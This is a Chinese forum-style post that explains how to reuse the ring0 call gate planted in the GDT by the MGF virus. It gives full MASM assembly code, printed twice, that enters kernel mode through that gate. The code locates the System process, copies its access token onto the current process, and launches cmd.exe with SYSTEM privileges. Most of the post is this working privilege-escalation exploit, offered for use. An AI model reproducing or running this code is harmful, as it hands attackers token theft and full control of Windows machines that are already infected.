去年有个叫MGF病毒大家我想还没有忘记吧,他修改NTLDR文件进入ring0,那么进入ring0我们究竟能做些什么呢?其实能做的事情很多的,不过网上有很多进入ring0的代码其实说实话没有什么用,首先他们进入ring0了后,代码仍然在0x80000000以下空间,如果有进程上下文切换,那么代码所在页就会别调换出去,解决方法是用ExAllocatePool申请一块非分页内存,将需要运行的代码拷贝过去,最后创建一个系统线程就可以了这样你的代码就和驱动程序的代码一样,IRQL = PASSIVE_LEVEL,好象扯远了,归到正题,那么如何利用MGF病毒呢?答案是使用MGF留在GDT中的callgate,利用这个调用门,我们就可以进入ring0,修改系统内存中的数据结构,例如当前进程的令牌,使我们能够提升权限,下面我就把我的垃圾代码帖出来,高手就别看了,今天就算是灌灌水吧。
;NE365 shadow3
.386
.model flat,stdcall
option casemap:none
include d:/masm32/include/windows.inc
include d:/masm32/include/kernel32.inc
include d:/masm32/include/user32.inc
includelib d:/masm32/lib/kernel32.lib
includelib d:/masm32/lib/user32.lib
.data
CallSel dd 0
dw 103h
pi PROCESS_INFORMATION <>
stStartup STARTUPINFOA <>
szToken db '当前system进程令牌为0x%08x',0
szBuffer db 512 dup(0)
;DEBUG equ 1
.code
start:
call fword ptr [CallSel]
;进入ring0,查找system进程
;使用PCR定位到KTEB
mov eax,0FFDFF124h ;eax->KTEB
mov eax,[eax];定位到KTEB
IFDEF DEBUG
jmp @CallExit
ENDIF
mov esi,[eax+044h] ;定位到KPEB
mov eax,esi
@search:
mov eax,[eax+0a0h]
sub eax,0a0h
mov edx,[eax+09ch]
cmp edx,08h ;判断是否是system进程
jne @search
mov eax,[eax+012ch] ;获取system进程的token
mov [esi+012ch],eax ;修改当前进程的token
@CallExit:
;准备返回ring3
mov ebx,@F
push ebx
retf
@@:
push eax
push offset szToken
push offset szBuffer
call wsprintf
push 0
push 0
push offset szBuffer
push 0
call MessageBox
;本进程令牌已经更改,创建一个子进程,继承进程令牌
lea ebx,stStartup
call GetStartupInfo
lea ebx,pi
push ebx
lea ecx,stStartup
push ecx
push 0
push 0
push 0
push TRUE
push 0
push 0
call szCmd
db 'cmd.exe',0
szCmd:
push 0
call CreateProcess
push 0
call ExitProcess
end start
;NE365 shadow3
.386
.model flat,stdcall
option casemap:none
include d:/masm32/include/windows.inc
include d:/masm32/include/kernel32.inc
include d:/masm32/include/user32.inc
includelib d:/masm32/lib/kernel32.lib
includelib d:/masm32/lib/user32.lib
.data
CallSel dd 0
dw 103h
pi PROCESS_INFORMATION <>
stStartup STARTUPINFOA <>
szToken db '当前system进程令牌为0x%08x',0
szBuffer db 512 dup(0)
;DEBUG equ 1
.code
start:
call fword ptr [CallSel]
;进入ring0,查找system进程
;使用PCR定位到KTEB
mov eax,0FFDFF124h ;eax->KTEB
mov eax,[eax];定位到KTEB
IFDEF DEBUG
jmp @CallExit
ENDIF
mov esi,[eax+044h] ;定位到KPEB
mov eax,esi
@search:
mov eax,[eax+0a0h]
sub eax,0a0h
mov edx,[eax+09ch]
cmp edx,08h ;判断是否是system进程
jne @search
mov eax,[eax+012ch] ;获取system进程的token
mov [esi+012ch],eax ;修改当前进程的token
@CallExit:
;准备返回ring3
mov ebx,@F
push ebx
retf
@@:
push eax
push offset szToken
push offset szBuffer
call wsprintf
push 0
push 0
push offset szBuffer
push 0
call MessageBox
;本进程令牌已经更改,创建一个子进程,继承进程令牌
lea ebx,stStartup
call GetStartupInfo
lea ebx,pi
push ebx
lea ecx,stStartup
push ecx
push 0
push 0
push 0
push TRUE
push 0
push 0
call szCmd
db 'cmd.exe',0
szCmd:
push 0
call CreateProcess
push 0
call ExitProcess
end start